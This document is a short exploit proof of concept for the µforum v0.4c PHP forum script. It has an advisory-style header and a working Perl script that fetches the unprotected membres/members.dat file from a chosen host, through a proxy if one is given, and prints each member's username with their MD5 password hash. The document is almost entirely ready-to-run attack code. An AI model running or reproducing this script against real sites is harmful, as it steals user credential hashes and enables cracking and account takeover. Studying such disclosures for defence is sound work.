forum v0.4c (members.dat) MD5 Passwd Hash Disclosure Poc

[gmdarkfig@xxxxxxxxx]

#!/usr/bin/perl
#
# Affected.scr..: µforum v0.4c
# Poc.ID........: 08060901
# Type..........: Member's passwords are stored in .dat file no protected by a 
.htaccess file
# Risk.level....: Medium
# Vendor.Status.: Unpatched
# Src.download..: comscripts.com/scripts/php.forum.1568.html
# Poc.link......: acid-root.new.fr/poc/08060901.txt
# Credits.......: DarkFig
#
use LWP::UserAgent;
use HTTP::Request;
use Getopt::Long;
use strict;

print STDOUT "\n+", '-' x 36, "+\n";
print STDOUT "| µforum v0.4c (members.dat) Exploit |\n";
print STDOUT '+', '-' x 36, "+\n";

my($host,$path,$proxh,$proxu,$proxp);
my $opt = GetOptions(
   'host=s'   =>  \$host,
   'path=s'   =>  \$path,
   'proxh=s'  =>  \$proxh,
   'proxu=s'  =>  \$proxu,
   'proxp=s'  =>  \$proxp);

if(!$path) {$path = '/';}
$host .= $path.'membres/members.dat';
if($host  !~ /http/) {$host = 'http://'.$host;}

my $ua = LWP::UserAgent->new();
   $ua->agent('Mozilla');
   $ua->timeout(30);
   $ua->proxy(['http'] => $proxh) if $proxh;

my $req = HTTP::Request->new('GET', $host);
   $req->proxy_authorization_basic($proxu, $proxp) if $proxp;

my $res = $ua->request($req);
my $dat = $res->content;
my @tabl= split(/:/, $dat);

foreach (@tabl) {
      if($_ =~ /"(.*)";a/){
            print "\n".$1.'::';}

      if($_ =~ /"([a-z0-9]{32})";i/){
            print $1;}
}

print "\n";
exit(0);